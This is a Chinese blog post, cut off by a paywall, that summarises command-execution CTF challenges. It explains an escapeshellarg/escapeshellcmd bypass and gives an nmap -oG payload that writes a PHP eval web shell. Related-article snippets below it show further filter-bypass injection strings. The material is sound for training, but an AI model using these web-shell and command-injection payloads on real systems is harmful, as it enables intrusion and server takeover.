命令执行类型CTF题目总结

最新推荐文章于 2024-05-16 15:06:52 发布
最新推荐文章于 2024-05-16 15:06:52 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lelouch_E/article/details/110142570
版权

命令执行类型CTF题

php命令执行

buu Online Tool

一段php代码审计:
在这里插入图片描述
大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellargescapeshellcmd方法转义后,转到之前创建的文件夹目录,执行nmap命令。
如果两方法以上述顺序执行会有绕过漏洞

  1. 传入的参数是:172.17.0.2‘ -v -d a=1
  2. 经过escapeshellarg处理后变成了’172.17.0.2’’ ’ -v -d a=1’ ,即先对单引号转义,再用单引号将语句左右用单引号括起
  3. 经过escapeshellcmd处理后变成了’172.17.0.2’\’ ’ -v -d a=1’ ,这是因为escapeshellcmd对\ 以及最后那个不配对的引号进行了转义
  4. 最后执行的命令是 curl ’172.17.0.2’ \ \ ’ ’ -v -d a=1\ ’ ,由于中间的 \ \ 被解释为 \ 而不再是转义字符,所以后面的 ’ 没有被转义,与再后面的 ’ 配对成了一个空白连接符,所以可以简化成 curl 172.10.0.2\ -v -d a=1’ ,即向172.17.0.2\ -v -d a=1’ ,即向172.17.0.2\ 发起请求,POST数据为a=1 ’

经过两次转义后出现了问题,没有考虑到单引号。
虽然单引号可以逃逸,但执行cmd的连接符被转义过滤,能利用的只有nmap命令。
nmap命令中能执行-oG,将命令和结果写入文件,构造payload:

?host=’ <?php @eval($_POST['hack'])l;?> -oG hack.php ’

执行后会返回文件名,蚁剑连接找到flag

禁止套娃

进去后没有任何提示,buu也不能扫,只能手动试,除了.git是403,还有flag.php空页面.拿GitHack扫一下.git,能得到index.php的源码:

<?php
最低0.47元/天 解锁文章
Lelouch_E
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf命令执行小结
舞动的獾
10-04 4495
1.相关函数 eval函数eval函数能够将字符串当作命令执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
CTF内存取证入坑指南!稳!题目
03-28
接下来,我们可以执行一些基本的Volatility命令,例如: 1. `info`:列出所有可用的插件,这些插件提供了各种分析功能。 2. `profiles`:识别并选择与内存映像匹配的操作系统内核配置。 3. `pslist`:列出系统中...
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
wangluoanquan111的博客
03-20 1050
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CTF(Web)中关于执行读取文件命令的相关知识与绕过技巧
最新发布
2401_84971075的博客
05-16 332
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1689
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2387
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
ctfshow---命令执行
fainpo的博客
03-20 1315
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
命令执行题目加理解
zbbjya的博客
03-21 730
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.csdn.net/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
CTF Web各种题目的解题姿势
07-27
第2章 代码执行命令执行 课时1:代码执行介绍49'32 课时2:命令执行介绍20'14 课时3:命令执行分类20'12 课时4:命令执行技巧24'30 课时5:长度限制的命令执行25'46 课时6:无数字和字母命令执行10'27 第3章...
ctf总结.md
05-14
先去DVWA中学习文件上传,文件包含,代码执行命令执行,尽量亲手操作一遍,然后看前三个难度的源码,impossible难度的可以了解,网上有针对DVWA很详细的讲解 1.养成看源代码的习惯(简单) flag在源代码中(): 题目 ...
ctf题库 CTF理论考核题及答案
07-05
7. **Linux管道符**:在Linux中,管道符是"|", 用于连接命令并将一个命令的输出作为另一个命令的输入。正确答案是C。 8. **非关系型数据库**:MongoDB是一种NoSQL数据库,不属于关系型数据库,如MySQL、SQL Server...
CTF-入门练习题
10-30
题目来自于蓝盾服务器,难度适中,适合于练习,需要wp请留言
CTF PWN 武器库题
12-12
5. **Shellcode**:编写能在目标环境中运行的shellcode,这是一段可以执行系统命令的汇编代码,通常用于在获得溢出控制权后获取shell。 6. **ROP(Return-Oriented Programming)**:如果ASLR(地址空间布局随机化...
4-杂项题目练习(一)
10-05
杂项题目练习(一) 本节课提供了8个杂项题目,涵盖了签到题、图片隐写、telnet、...本节课提供了多种CTF题目,涵盖了签到题、图片隐写、telnet、ISCCCTF、啊哒等多种题型,旨在帮助读者更好地理解和掌握相关知识点。
绿城杯 CTF 2021 真题 (1).rar
12-07
6. **逆向工程**:如果`task.py`包含可执行代码,可能需要进行反汇编或动态调试,理解其运行逻辑。Python的`dis`模块可用于查看Python字节码,`pymem`等库用于内存操作。 7. **漏洞利用**:在Web安全方面,可能会有...
De1ctf 2020 -‘check in’ writeup
01-09
在这个例子中,禁止了与命令执行、加密、远程访问等相关工具的名称,比如curl、openssl等。这要求攻击者找到方法在不触碰这些关键词的情况下构建有效payload。 5. **fuzzing技术**: fuzzing是一种测试方法,通过...
指令执行过程(习题)
weixin_43638873的博客
09-05 1994
按照题目中的说法,不采用Cache也不用指令预取,那么当运行到这条指令时,指令尚未取出,并且只能从内存中取。 机器周期一般以内存读取一条指令字的最短时间来定义,而且是可以变长的。 计算机中的取指过程: 转移指令的指令周期: 在取指过程中,MAR(地址寄存器)相当于半路上的中转站 (***第二次对于PC的修改在无条件跳转指令中必定会发生,而在有条件跳转指令中则未必发生,因此题目要强调“无条件跳转指令”***) 取指操作是由控制器自动进行的,如果控制器...
基础题目五:命令执行
king丶
07-31 1163
基础题目五:命令执行 发现过滤 cat | &符没过滤 127.0.0.1& 能执行 127.0.0.1&cat ../key.php 发现还是不行。 那就是过滤了cat 使用\ 127.0.0.1&c\at ../key.php 还是不行,过滤了key 使用通配符 127.0.0.1&c\at ../ke* 通配符 通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查
ctfshow-web41~60-WP
02-21
这使得攻击者无法直接看到命令执行的结果。在这种情况下,可以尝试使用命令分隔符,如分号(;)或逻辑或操作符(||),将多个命令写在一个payload中,使得第一个命令(导致无回显)被执行,而第二个命令(如输出flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值